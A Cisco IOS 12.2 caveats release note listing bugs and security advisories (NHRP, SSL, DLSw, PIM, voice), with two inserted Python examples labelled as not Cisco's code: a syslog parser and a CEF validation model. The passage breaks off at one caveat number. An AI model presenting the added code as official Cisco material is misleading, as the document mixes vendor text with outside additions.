
Cross-Platform Release Notes for Cisco IOS Release 12.2, Part 5: Caveats for 12.2(16) through 12.2(46a)


Caveats for Cisco IOS Release 12.2


September 24, 2008

Cisco IOS Release 12.2(46a)

OL-3513-16 Rev. G0

This document lists severity 1 and 2 caveats and select severity 3 caveats for Cisco IOS Release 12.2, up to and including Cisco IOS Release 12.2(46a). Caveats describe unexpected behavior or defects in Cisco IOS software releases. Severity 1 caveats are the most serious caveats; severity 2 caveats are less serious.

To improve this document, we would appreciate your comments. If you are reading Cisco product documentation on the World Wide Web, you can submit comments electronically at http://www.cisco.com/feedback/ or contact caveats-doc@cisco.com. For more information, see the "Obtaining Documentation and Submitting a Service Request" section on page 893.

Contents

How to Use This Document

If You Need More Information

Resolved Caveats—Cisco IOS Release 12.2(46a)

Open Caveats—Cisco IOS Release 12.2(46)

Resolved Caveats—Cisco IOS Release 12.2(46)

Resolved Caveats—Cisco IOS Release 12.2(40a)

Resolved Caveats—Cisco IOS Release 12.2(40)

Resolved Caveats—Cisco IOS Release 12.2(37)

Resolved Caveats—Cisco IOS Release 12.2(34a)

Resolved Caveats—Cisco IOS Release 12.2(34)

Resolved Caveats—Cisco IOS Release 12.2(32)

Resolved Caveats—Cisco IOS Release 12.2(31)

Resolved Caveats—Cisco IOS Release 12.2(29b)

Resolved Caveats—Cisco IOS Release 12.2(29a)

Resolved Caveats—Cisco IOS Release 12.2(29)

Resolved Caveats—Cisco IOS Release 12.2(28d)

Resolved Caveats—Cisco IOS Release 12.2(28c)

Resolved Caveats—Cisco IOS Release 12.2(28b)

Resolved Caveats—Cisco IOS Release 12.2(28a)

Resolved Caveats—Cisco IOS Release 12.2(28)

Resolved Caveats—Cisco IOS Release 12.2(27c)

Resolved Caveats—Cisco IOS Release 12.2(27b)

Resolved Caveats—Cisco IOS Release 12.2(27a)

Resolved Caveats—Cisco IOS Release 12.2(27)

Resolved Caveats—Cisco IOS Release 12.2(26c)

Resolved Caveats—Cisco IOS Release 12.2(26b)

Resolved Caveats—Cisco IOS Release 12.2(26a)

Resolved Caveats—Cisco IOS Release 12.2(26)

Resolved Caveats—Cisco IOS Release 12.2(24b)

Resolved Caveats—Cisco IOS Release 12.2(24a)

Resolved Caveats—Cisco IOS Release 12.2(24)

Resolved Caveats—Cisco IOS Release 12.2(23f)

Resolved Caveats—Cisco IOS Release 12.2(23e)

Resolved Caveats—Cisco IOS Release 12.2(23d)

Resolved Caveats—Cisco IOS Release 12.2(23c)

Resolved Caveats—Cisco IOS Release 12.2(23a)

Resolved Caveats—Cisco IOS Release 12.2(23)

Resolved Caveats—Cisco IOS Release 12.2(21b)

Resolved Caveats—Cisco IOS Release 12.2(21a)

Resolved Caveats—Cisco IOS Release 12.2(21)

Resolved Caveats—Cisco IOS Release 12.2(19c)

Resolved Caveats—Cisco IOS Release 12.2(19b)

Resolved Caveats—Cisco IOS Release 12.2(19a)

Resolved Caveats—Cisco IOS Release 12.2(19)

Resolved Caveats—Cisco IOS Release 12.2(17f)

Resolved Caveats—Cisco IOS Release 12.2(17e)

Resolved Caveats—Cisco IOS Release 12.2(17d)

Resolved Caveats—Cisco IOS Release 12.2(17b)

Resolved Caveats—Cisco IOS Release 12.2(17a)

Resolved Caveats—Cisco IOS Release 12.2(17)

Resolved Caveats—Cisco IOS Release 12.2(16f)

Resolved Caveats—Cisco IOS Release 12.2(16c)

Resolved Caveats—Cisco IOS Release 12.2(16b)

Resolved Caveats—Cisco IOS Release 12.2(16a)

Resolved Caveats—Cisco IOS Release 12.2(16)

Resolved Caveats—Cisco IOS Release 12.2(13e)

Resolved Caveats—Cisco IOS Release 12.2(13c)

Resolved Caveats—Cisco IOS Release 12.2(13b)

Resolved Caveats—Cisco IOS Release 12.2(13a)

Resolved Caveats—Cisco IOS Release 12.2(13)

Resolved Caveats—Cisco IOS Release 12.2(12m)

Resolved Caveats—Cisco IOS Release 12.2(12l)

Resolved Caveats—Cisco IOS Release 12.2(12k)

Resolved Caveats—Cisco IOS Release 12.2(12j)

Resolved Caveats—Cisco IOS Release 12.2(12i)

Resolved Caveats—Cisco IOS Release 12.2(12h)

Resolved Caveats—Cisco IOS Release 12.2(12g)

Resolved Caveats—Cisco IOS Release 12.2(12f)

Resolved Caveats—Cisco IOS Release 12.2(12e)

Resolved Caveats—Cisco IOS Release 12.2(12c)

Resolved Caveats—Cisco IOS Release 12.2(12b)

Resolved Caveats—Cisco IOS Release 12.2(12a)

Resolved Caveats—Cisco IOS Release 12.2(12)

Resolved Caveats—Cisco IOS Release 12.2(10g)

Resolved Caveats—Cisco IOS Release 12.2(10d)

Resolved Caveats—Cisco IOS Release 12.2(10b)

Resolved Caveats—Cisco IOS Release 12.2(10a)

Resolved Caveats—Cisco IOS Release 12.2(10)

Resolved Caveats—Cisco IOS Release 12.2(7g)

Resolved Caveats—Cisco IOS Release 12.2(7e)

Resolved Caveats—Cisco IOS Release 12.2(7c)

Resolved Caveats—Cisco IOS Release 12.2(7b)

Resolved Caveats—Cisco IOS Release 12.2(7a)

Resolved Caveats—Cisco IOS Release 12.2(7)

Resolved Caveats—Cisco IOS Release 12.2(6j)

Resolved Caveats—Cisco IOS Release 12.2(6i)

Resolved Caveats—Cisco IOS Release 12.2(6h)

Resolved Caveats—Cisco IOS Release 12.2(6g)

Resolved Caveats—Cisco IOS Release 12.2(6f)

Resolved Caveats—Cisco IOS Release 12.2(6e)

Resolved Caveats—Cisco IOS Release 12.2(6d)

Resolved Caveats—Cisco IOS Release 12.2(6c)M1

Resolved Caveats—Cisco IOS Release 12.2(6c)

Resolved Caveats—Cisco IOS Release 12.2(6b)

Resolved Caveats—Cisco IOS Release 12.2(6a)

Resolved Caveats—Cisco IOS Release 12.2(6)

Resolved Caveats—Cisco IOS Release 12.2(5d)

Resolved Caveats—Cisco IOS Release 12.2(5c)

Resolved Caveats—Cisco IOS Release 12.2(5a)

Resolved Caveats—Cisco IOS Release 12.2(5)

Resolved Caveats—Cisco IOS Release 12.2(3g)

Resolved Caveats—Cisco IOS Release 12.2(3d)

Resolved Caveats—Cisco IOS Release 12.2(3b)

Resolved Caveats—Cisco IOS Release 12.2(3a)

Resolved Caveats—Cisco IOS Release 12.2(3)

Resolved Caveats—Cisco IOS Release 12.2(2)

Resolved Caveats—Cisco IOS Release 12.2(1)M0

Resolved Caveats—Cisco IOS Release 12.2(1d)

Resolved Caveats—Cisco IOS Release 12.2(1c)

Resolved Caveats—Cisco IOS Release 12.2(1b)

Resolved Caveats—Cisco IOS Release 12.2(1a)

Resolved Caveats—Cisco IOS Release 12.2(1)

Obtaining Documentation and Submitting a Service Request

How to Use This Document

This document describes open and resolved severity 1 and 2 caveats and select severity 3 caveats:

The "Open Caveats" section lists open caveats that apply to the current release and may apply to previous releases.

The "Resolved Caveats" sections list caveats resolved in a particular release, but open in previous releases.

Within the sections the caveats are sorted by technology in alphabetical order. For example, AppleTalk caveats are listed separately from, and before, IP caveats. The caveats are also sorted alphanumerically by caveat number.

If You Need More Information

Cisco IOS software documentation can be found on the web through Cisco.com. For information on Cisco.com, see the "Obtaining Documentation and Submitting a Service Request" section on page 893.

For more information on caveats and features in Cisco IOS Release 12.2, refer to the following sources:

Dictionary of Internetworking Terms and Acronyms—The Dictionary of Internetworking Terms and Acronyms contains definitions of acronyms that are not defined in this caveats document.

Bug Toolkit—If you have an account on Cisco.com, you can also use the Bug Toolkit to find select caveats of any severity. To reach the Bug Toolkit, log in to Cisco.com and click Service & Support: Software Center: Cisco IOS Software: BUG TOOLKIT. Another option is to go to http://www.cisco.com/pcgi-bin/Support/Bugtool/launch_bugtool.pl. (If the defect that you have requested cannot be displayed, this may be due to one or more of the following reasons: the defect number does not exist, the defect does not have a customer-visible description yet, or the defect has been marked Cisco Confidential.)

Release Notes for Cisco IOS Release 12.2—These release notes describe new features and significant software components for Cisco IOS software Release 12.2.

Deferral Advisories and Software Advisories for Cisco IOS Software—Deferral Advisories and Software Advisories for Cisco IOS Software provides information about caveats that are related to deferred software images for Cisco IOS releases. If you have an account on Cisco.com, you can access Deferral Advisories and Software Advisories for Cisco IOS Software at http://www.cisco.com/public/sw-center/sw-ios-advisories.shtml.

What's New for IOS—What's New for IOS lists recently posted Cisco IOS software releases and software releases that have been removed from Cisco.com. If you have an account on Cisco.com, you can access What's New for IOS at http://www.cisco.com/public/sw-center/sw-ios.shtml.

Cisco IOS Software Roadmap—The Cisco IOS Software Roadmap illustrates the relationship of the various Cisco IOS releases. If you have an account on Cisco.com, you can access the Cisco IOS Software Roadmap at http://www.cisco.com/warp/public/620/roadmap_b.shtml.

The most recent release notes when this caveats document was published were Release Notes for Cisco IOS Release 12.2, for Cisco IOS Release 12.2(46) on April 27, 2007.

Resolved Caveats—Cisco IOS Release 12.2(46a)

Cisco IOS Release 12.2(46a) is a rebuild release for Cisco IOS Release 12.2(46). The caveats in this section are resolved in Cisco IOS Release 12.2(46a) but may be open in previous Cisco IOS releases.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Miscellaneous

CSCsg70474

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.254

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

CSCsi60004

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.254

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

CSCsi74508

Symptoms: A Cisco IOS device may produce the following error when reading or writing the configuration:

%DATACORRUPTION-1-DATAINCONSISTENCY: write of 11 bytes to 10 bytes

Conditions: This symptom has been observed when reading or writing the configuration.

Workaround: There is no workaround.

CSCsi78162

Symptoms: A router that has the SNASwitch feature enabled may generate several of the following messages along with tracebacks:

%DATACORRUPTION-1-DATAINCONSISTENCY: copy of xx bytes should be xx bytes

Conditions: This symptom is observed on a Cisco router that runs a Cisco IOS software image that contains the fix for caveat CSCsh87705. A list of the affected releases can be found at http://www.cisco.com/pcgi-bin/Support/Bugtool/onebug.pl?bugid=CSCsh87705. Cisco IOS software releases that are not listed in the "First Fixed-in Version" field at this location are not affected.

Workaround: There is no workaround.

Further Problem Description: The messages do not affect the normal operation of the router in any way. The SNASwitch continues to function normally.

CSCsj16292

Symptoms: Following an upgrade to Cisco IOS Release 12.2(18)SXF9, the following message may be displayed:

%DATACORRUPTION-1-DATAINCONSISTENCY: copy error -Traceback=

Conditions: This message may appear as a result of SNMP polling of PAgP variables, but does not appear to be service impacting.

Workaround: There is no workaround.
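The three DATACORRUPTION-1-DATAINCONSISTENCY message forms quoted in the caveats above are the kind of syslog line a reviewer wants parsed and counted rather than read one by one. The following is an added example, not Cisco's code or part of these release notes; its timestamped sample lines are constructed, and the byte counts and traceback addresses in them are placeholders.

```python
"""Triage of %DATACORRUPTION-1-DATAINCONSISTENCY syslog messages.

Added example, not Cisco code: parses Cisco-style syslog lines, keeps the
DATACORRUPTION/DATAINCONSISTENCY ones quoted in caveats CSCsi74508,
CSCsi78162 and CSCsj16292, and extracts the operation, the byte counts and
whether a traceback was attached. Sample log lines are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# %FACILITY-SEVERITY-MNEMONIC: text  (Cisco IOS system message format)
SYSLOG_RE = re.compile(
    r"%(?P<facility>[A-Z0-9_]+)-(?P<severity>\d)-(?P<mnemonic>[A-Z0-9_]+):\s*(?P<text>.*)"
)
# Message texts seen in the caveats: "write of N bytes to M bytes" and
# "copy of N bytes should be M bytes"; "copy error" carries no sizes.
WRITE_RE = re.compile(r"write of (\d+) bytes to (\d+) bytes")
COPY_RE = re.compile(r"copy of (\d+) bytes should be (\d+) bytes")


@dataclass
class DataInconsistency:
    severity: int
    operation: str            # "write", "copy", "copy-error" or "unknown"
    actual: Optional[int]     # bytes actually written/copied, if reported
    expected: Optional[int]   # destination size / expected size, if reported
    traceback: bool           # message carried a "-Traceback=" suffix
    raw: str

    @property
    def overflow(self) -> Optional[int]:
        """Bytes by which the operation exceeded its destination (None if not reported)."""
        if self.actual is None or self.expected is None:
            return None
        return self.actual - self.expected


def parse_line(line: str) -> Optional[DataInconsistency]:
    """Return a DataInconsistency for a DATACORRUPTION-*-DATAINCONSISTENCY line, else None."""
    m = SYSLOG_RE.search(line)
    if not m or m["facility"] != "DATACORRUPTION" or m["mnemonic"] != "DATAINCONSISTENCY":
        return None
    text = m["text"]
    severity = int(m["severity"])
    traceback = "-Traceback=" in text
    if (w := WRITE_RE.search(text)):
        return DataInconsistency(severity, "write", int(w[1]), int(w[2]), traceback, line)
    if (c := COPY_RE.search(text)):
        return DataInconsistency(severity, "copy", int(c[1]), int(c[2]), traceback, line)
    if text.startswith("copy error"):
        return DataInconsistency(severity, "copy-error", None, None, traceback, line)
    return DataInconsistency(severity, "unknown", None, None, traceback, line)


def triage(lines: Iterable[str]) -> List[DataInconsistency]:
    """Keep only the DATAINCONSISTENCY events from a stream of syslog lines."""
    return [ev for ev in map(parse_line, lines) if ev is not None]


def summarize(events: List[DataInconsistency]) -> Dict[str, int]:
    """Counts per operation, plus how many carried a traceback or a positive overflow."""
    summary: Dict[str, int] = {"total": len(events), "with_traceback": 0, "with_overflow": 0}
    for ev in events:
        summary[ev.operation] = summary.get(ev.operation, 0) + 1
        summary["with_traceback"] += int(ev.traceback)
        summary["with_overflow"] += int(ev.overflow is not None and ev.overflow > 0)
    return summary


# Constructed sample lines; message texts follow the forms quoted in the caveats,
# with placeholder byte counts and traceback addresses.
SAMPLE_LOG = [
    "Mar  3 10:15:02.114: %DATACORRUPTION-1-DATAINCONSISTENCY: write of 11 bytes to 10 bytes",
    "Mar  3 10:15:02.118: %DATACORRUPTION-1-DATAINCONSISTENCY: copy of 24 bytes should be 16 bytes, -Traceback= 0x601A2B3C 0x601A2D40",
    "Mar  3 10:15:07.900: %DATACORRUPTION-1-DATAINCONSISTENCY: copy error -Traceback= 0x60A1B2C3",
    "Mar  3 10:15:09.001: %SYS-5-CONFIG_I: Configured from console by console",
]

if __name__ == "__main__":
    events = triage(SAMPLE_LOG)
    for ev in events:
        print(f"sev{ev.severity} {ev.operation:<10} overflow={ev.overflow} traceback={ev.traceback}")
    print(summarize(events))
```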

TCP/IP Host-Mode Services

CSCeh48684

Symptoms: The Identification field is always 0 in the TACACS+ packet that has the SYN flag set. The TACACS+ packet travels from a Catalyst 6509 through a firewall (FW) to the AAA server. The FW construes this as a Fragment Overlap Attack and drops additional new connections.

Conditions: This symptom has been observed on a Catalyst 6509 connecting through an FW to an AAA server.

Workaround: There is no workaround.

Open Caveats—Cisco IOS Release 12.2(46)

This section describes possibly unexpected behavior by Cisco IOS Release 12.2(46). All the caveats listed in this section are open in Cisco IOS Release 12.2(46). This section describes severity 1 and 2 caveats and select severity 3 caveats.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Basic System Services

CSCse80032

Symptoms: An SNMP Manager that uses SNMPv3 may not resynchronize the timer for the SNMP engine after the router has been reloaded.

Conditions: This symptom is observed on a Cisco Catalyst 6000 series switch and a Cisco 7600 series router that have been reloaded. It occurs because a parameter is incorrectly set in the REPORT message, causing a mediation device to register an SNMP timeout instead of a reload.

Workaround: You may be able to restart the SNMP Manager to force the timer for the SNMP engine to resynchronize. Note, however, that doing so causes a 100-percent outage for all wiretaps that are served by the SNMP Manager. If you cannot restart the SNMP Manager, there is no workaround.

IP Routing Protocols

CSCsg51897

Symptoms: The MQC rate-limiting feature does not work on a multilink interface of an RSP router that is configured with MDS when the policy is applied as an output policy. As a result, traffic is not rate limited, and all traffic passes through.

Conditions: This symptom is observed on an RSP router that is running Cisco IOS Interim Release 12.4(11.6a).

Workaround: There is no workaround.

Miscellaneous

CSCea53765

Symptoms: Adding a /31 netmask route on a Cisco router may not overwrite an existing /32 CEF entry.

Conditions: This symptom is observed on a Cisco router that runs Cisco IOS Release 12.1(13)E4, Release 12.2, other 12.1 E releases, or Release 12.3.

Workaround: There is no workaround.

Further Problem Description: The fix for this caveat enables prefixes that are derived from adjacencies in the FIB to be periodically validated against covering prefixes that originate from the RIB. Validation ensures that an adjacency prefix is only active when it points out of the same interface as a covering attached prefix. To enable this validation, enter the ip cef table adjacency-prefix validate global configuration command.

Note that because validation is periodic, there could be a time lag between RIB changes and subsequent validation or withdrawal of covered adjacencies in the FIB.
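As an added example (not Cisco's code and not part of these release notes), a small Python model of the validation rule described above: adjacency-derived prefixes in the FIB are checked against the covering attached prefix from the RIB and withdrawn when the two point out of different interfaces. Interface names, addresses and the stale /32 scenario are constructed.

```python
"""Toy model of CEF adjacency-prefix validation (caveat CSCea53765).

Added example, not Cisco's code: a RIB of attached prefixes, a FIB that mixes
RIB-installed prefixes with adjacency-derived host (/32) entries, and the rule
the fix describes: an adjacency prefix stays active only while the covering
attached prefix in the RIB points out of the same interface. Interface names
and addresses are constructed.
"""
from dataclasses import dataclass
from ipaddress import IPv4Network, ip_network
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class RibRoute:
    prefix: IPv4Network
    interface: str
    attached: bool = True  # connected/attached prefix in the RIB


@dataclass
class FibEntry:
    prefix: IPv4Network
    interface: str
    source: str  # "rib" (installed from the RIB) or "adjacency" (derived from an adjacency)
    active: bool = True


def covering_attached_prefix(rib: List[RibRoute], prefix: IPv4Network) -> Optional[RibRoute]:
    """Longest attached RIB prefix that covers `prefix`, or None if none does."""
    covers = [r for r in rib if r.attached and r.prefix.supernet_of(prefix)]
    return max(covers, key=lambda r: r.prefix.prefixlen, default=None)


def fib_lookup(fib: List[FibEntry], address: str) -> Optional[str]:
    """Longest-prefix match over active FIB entries; returns the outgoing interface."""
    host = ip_network(f"{address}/32")
    matches = [e for e in fib if e.active and e.prefix.supernet_of(host)]
    best = max(matches, key=lambda e: e.prefix.prefixlen, default=None)
    return best.interface if best else None


def validate_adjacency_prefixes(rib: List[RibRoute], fib: List[FibEntry]) -> List[Tuple[IPv4Network, str]]:
    """One periodic validation pass (what 'ip cef table adjacency-prefix validate' enables).

    Every adjacency-derived FIB prefix is checked against the covering attached
    prefix from the RIB. Returns (prefix, reason) for each entry whose state
    changed. Because the pass is periodic, a RIB change only reaches the FIB at
    the next pass, which is the time lag the caveat notes.
    """
    changes: List[Tuple[IPv4Network, str]] = []
    for entry in fib:
        if entry.source != "adjacency":
            continue
        cover = covering_attached_prefix(rib, entry.prefix)
        if cover is None:
            should_be_active, reason = False, "no covering attached prefix in the RIB"
        elif cover.interface != entry.interface:
            should_be_active = False
            reason = f"covering {cover.prefix} is on {cover.interface}, adjacency is on {entry.interface}"
        else:
            should_be_active, reason = True, f"covered by {cover.prefix} on {cover.interface}"
        if entry.active != should_be_active:
            entry.active = should_be_active
            changes.append((entry.prefix, ("activated: " if should_be_active else "withdrawn: ") + reason))
    return changes


def caveat_scenario() -> Tuple[Optional[str], Optional[str], List[Tuple[IPv4Network, str]]]:
    """Constructed reproduction of the CSCea53765 situation.

    A stale /32 adjacency entry for 10.0.0.1 points out Ethernet1; a /31
    attached route covering it is then added on Ethernet0. Without validation
    the more specific /32 keeps winning the lookup, so traffic leaves the
    wrong interface. Returns (interface before, interface after, changes).
    """
    rib = [RibRoute(ip_network("10.0.0.0/31"), "Ethernet0")]
    fib = [
        FibEntry(ip_network("10.0.0.1/32"), "Ethernet1", source="adjacency"),
        FibEntry(ip_network("10.0.0.0/31"), "Ethernet0", source="rib"),
    ]
    before = fib_lookup(fib, "10.0.0.1")   # stale adjacency wins: Ethernet1
    changes = validate_adjacency_prefixes(rib, fib)
    after = fib_lookup(fib, "10.0.0.1")    # /31 is now used: Ethernet0
    return before, after, changes


if __name__ == "__main__":
    before, after, changes = caveat_scenario()
    print(f"lookup 10.0.0.1 before validation -> {before}")
    for prefix, reason in changes:
        print(f"  {prefix}: {reason}")
    print(f"lookup 10.0.0.1 after validation  -> {after}")
```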

CSCin86002

Symptoms: The bandwidth of an IMA group interface may be less than the combined bandwidth of its active member links that are up and operational.

Conditions: This symptom is observed on an IMA group interface of a PA-A3-8T1IMA or PA-A3-8E1IMA port adapter that is installed in a Cisco 7xxx platform when the IMA group interface has more than one member link. The symptom occurs when you enter the shutdown interface configuration command quickly followed by the no shutdown interface configuration command on a member link (that is, the command sequence takes less than two seconds). When the member link comes up, the bandwidth of the IMA group interface is not increased.

Workaround: There is no workaround.

CSCsh61946

Symptoms: After an SSO switchover has occurred, the second of two 6000 W DC power supplies in the chassis is shut down.

Conditions: This symptom is observed on a Cisco Catalyst 6000 series switch and Cisco 7600 router when both power supplies are powered on before the SSO switchover occurs.

Workaround: There is no workaround.

CSCsh85531

Symptoms: Some E1 channels may remain down after you have reloaded a router.

Conditions: This symptom is observed on a Cisco 7200 series router that functions as a PE router and connects to a CE router. Both routers are connected through 1-port multichannel STM-1 (PA-MC-STM-1) port adapters, and the framing no-crc4 command is enabled on all interfaces of both routers.

Workaround: Enter the shutdown command followed by the no shutdown command on the SONET controller of the PA-MC-STM-1 at the PE side to enable all interfaces to come up.

CSCsi51581

Symptoms: A VIP4-80 that is running Cisco IOS Release 12.2(40) crashes due to a software bus error.

Conditions: This symptom is observed when a VIP4-80 crashes while all interfaces are coming up.

Workaround: There is no workaround.

Resolved Caveats—Cisco IOS Release 12.2(46)

This section describes possibly unexpected behavior by Cisco IOS Release 12.2(46). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(46). This section describes severity 1 and 2 caveats and select severity 3 caveats.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Basic System Services

CSCeg62070

Symptoms: Tracebacks or a crash are seen during HTTP transactions with long URLs.

Conditions: The crash is seen when the length of any token in the URL of the request is excessively long.

Workaround: Disable HTTP server using the no ip http server command.

IBM Connectivity

CSCsf28840

A vulnerability exists in the Data-link Switching (DLSw) feature in Cisco IOS where an invalid value in a DLSw message could result in a reload of the DLSw device. Successful exploitation of this vulnerability requires that an attacker be able to establish a DLSw connection to the device.

There are workarounds available for this vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070110-dlsw.shtml

IP Routing Protocols

CSCsi23231

The Cisco Next Hop Resolution Protocol (NHRP) feature in Cisco IOS contains a vulnerability that can result in a restart of the device or possible remote code execution.

NHRP is a primary component of the Dynamic Multipoint Virtual Private Network (DMVPN) feature.

NHRP can operate in three ways: at the link layer (Layer 2), over Generic Routing Encapsulation (GRE) and multipoint GRE (mGRE) tunnels, and directly on IP (IP protocol number 54). This vulnerability affects all three methods of operation.

NHRP is not enabled by default for Cisco IOS.

This vulnerability is addressed by Cisco bug IDs CSCin95836 (registered customers only) for non-12.2 mainline releases and CSCsi23231 (registered customers only) for 12.2 mainline releases.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-nhrp.shtml.

Miscellaneous

CSCeb21064

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.254

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

CSCin83971

Symptoms: Voice calls with ground-start signaling fail at the terminating gateway (TGW) with confirmed errors at the originating side.

Conditions: This symptom is observed when the dial peers are matched, when VTSP initiates dialing the remote destination, when the DSP fails to wait for the offhook signal transition from the remote endpoint, and when the DSPRM closes the DSP voice channel.

Workaround: Enter the shutdown command followed by the no shutdown command on the affected voice port on the TGW. Note that the symptom does not occur with loop-start signaling.

CSCsb12598

A Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. To trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.

Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, the vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker to decrypt any previously encrypted information.

Cisco IOS is affected by the following vulnerabilities:

Processing ClientHello messages, documented as Cisco bug ID CSCsb12598

Processing ChangeCipherSpec messages, documented as Cisco bug ID CSCsb40304

Processing Finished messages, documented as Cisco bug ID CSCsd92405

Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.


Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml.


A combined software table for Cisco IOS is available to aid customers in choosing a software release that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.

CSCsb40304

A Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. To trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.

Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, the vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker to decrypt any previously encrypted information.

Cisco IOS is affected by the following vulnerabilities:

Processing ClientHello messages, documented as Cisco bug ID CSCsb12598

Processing ChangeCipherSpec messages, documented as Cisco bug ID CSCsb40304

Processing Finished messages, documented as Cisco bug ID CSCsd92405

Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.


Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml.


A combined software table for Cisco IOS is available to aid customers in choosing a software release that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.

CSCsd81407

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.254

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

CSCsd92405

A Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.

Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, the vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker to decrypt any previously encrypted information.

Cisco IOS is affected by the following vulnerabilities:

Processing ClientHello messages, documented as Cisco bug ID CSCsb12598

Processing ChangeCipherSpec messages, documented as Cisco bug ID CSCsb40304

Processing Finished messages, documented as Cisco bug ID CSCsd92405

Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.


Note Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml.


A combined software table for Cisco IOS is available to aid customers in choosing a software release that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.

CSCsd95616

Two crafted Protocol Independent Multicast (PIM) packet vulnerabilities exist in Cisco IOS software that may lead to a denial of service (DoS) condition. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml.

CSCsg16908

